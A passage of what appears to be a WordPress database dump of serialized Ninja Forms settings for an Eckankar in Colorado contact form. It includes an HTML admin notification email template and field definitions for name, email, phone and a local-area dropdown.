the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:43;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:03\";s:5:\"label\";s:11:\"Admin Email\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:42:\"Colorado Springs Initiators and ESAâs\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:3911:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Colorado Springs Initiators and ESAâs</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for theÂ <em>Colorado Springs Leadership Organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_118}Â {field:lastname_119}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_118}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_119}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_120}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_121}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_122}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166439207}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_126}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:44;}}s:8:\"settings\";a:41:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:36:\"Colorado Springs Initiators and ESAs\";s:10:\"created_at\";s:19:\"2019-07-15 14:05:30\";s:10:\"form_title\";s:42:\"Colorado Springs Initiators and ESAâs\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2017-07-04 17:23:30\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:1:\"1\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:11:{i:0;s:8:\"html_117\";i:1;s:11:\"textbox_118\";i:2;s:12:\"lastname_119\";i:3;s:9:\"email_120\";i:4;s:9:\"phone_121\";i:5;s:14:\"listselect_122\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166439207\";i:7;s:12:\"textarea_126\";i:8;s:18:\"html_1663801551902\";i:9;s:10:\"submit_128\";i:10;s:18:\"html_1663801548990\";}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:20:\"repeatable_fieldsets\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(12,'a:7:{s:2:\"id\";i:12;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:13:{i:0;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:201:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Leadership Communications</span></span></span></strong></span></h3>\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:201:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Leadership Communications</span></span></span></strong></span></h3>\";s:3:\"key\";s:7:\"html_32\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:7:\"html_32\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:120;}i:1;a:2:{s:8:\"settings\";a:51:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:10:\"textbox_33\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:10:\"textbox_33\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:121;}i:2;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"lastname_34\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:11:\"lastname_34\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:122;}i:3;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:8:\"email_35\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:8:\"email_35\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:123;}i:4;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:8:\"phone_36\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:8:\"phone_36\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:124;}i:5;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:15:\"Your Local Area\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 